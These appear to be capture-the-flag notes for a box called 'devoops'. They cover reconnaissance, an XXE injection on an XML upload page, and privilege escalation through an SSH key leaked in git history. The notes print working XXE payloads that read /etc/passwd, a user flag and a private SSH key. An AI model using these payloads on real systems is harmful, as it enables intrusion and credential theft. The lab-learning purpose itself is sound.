devoops

nmapAutomator.sh

recon

gobuster
nikto

gobuster

/feed
/upload

nikto

http (port 5000) gunicorn

todo is worth noting
dev.solita.fi
images/1425-1.png

service is gunicorn, a python web server
images/1425-2.png

/feed

allthough this page looks like a webpage written in html, its just a picture

/upload

might be able to upload a webshell here, lets check it out
images/1428-1.png

test.xml

XML note in the upload page, lets try uploading a test.xml file

images/1429-1.png

the webpage is mentioning an Author, Subject and Content field in its BLOGPOST note, lets write an xml file that contain those parameters

<?xml version="1.0"?>
<test>
<Author>test</Author>
<Subject>test</Subject>
<Content>test</Content>
</test>
images/1429-2.png

XML XXE Injection foothold

payloadallthethings XXE

Check out payloadallthethings github link here

images/1432-1.png

<?xml version="1.0"?>
<!DOCTYPE replace [<!ENTITY example “Doe”>]>
<test>
<Author>test</Author>
<Subject>test</Subject>
<Content>test</Content>
</test>

images/1432-4.png

since the author entity is replaced with the string “Doe” we know our XXE exploit is working as intended, lets see if we can leak some sensitive files next...

/etc/password

applying this vulnerability to our existing exploit we just have to update the DOCTYPE variable:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM ‘file:///etc/passwd’>]>
<test>
<Author>test</Author>
<Subject>test</Subject>
<Content>test</Content>
</test>

images/1433-2.png

the server response leaks /etc/passwd!
further enumerating the server response shows us theres a user by the name of roosa

leak user.txt

we can leak user.txt by setting the system call's file to point towards /home/roosa/user.txt
images/1434-1.png

/.ssh/id_rsa

lets see if we can leak the ssh key by guessing to see if roosa has an id_rsa file in her the .ssh folder of her directory
images/1435-1.png

we have roosa's private key!
now we take that and save it to a file id_rsa and give it proper permissions

images/1435-2.png

privesc

LinEnum.sh

roosa bash_history

we see there is a comment in roosa's bash_history log that notes a git upload footnote denotring that there was an accidental key commit that needed to be replaced, could that be root's private key?

images/1440-1.png

git log

to look at the server's git hub upload history, use
git log

images/1441-1.png

"reverted accidental commit " log

We found the commit ID that pertains to the note we saw ealier in roosa's bash_history, we can print the outputs of this commit with the ID

images/1442-1.png

33e87c312c08735a02fa9c796021a4a3023129ad

git show

to show the contents of the commit, use
git show 33e87c312c08735a02fa9c796021a4a3023129ad
images/1445-1.png

lets paste it on our local machine and give it proper privileges
images/1445-4.png

unknown id_rsa

troublesome ‘-’'s begin every line, use :%s/-//g to globally replace all of them
where
:%s/ starts the replacement statement
/-// replaces - with nothing
g is to issue the command globally
images/1446-2.png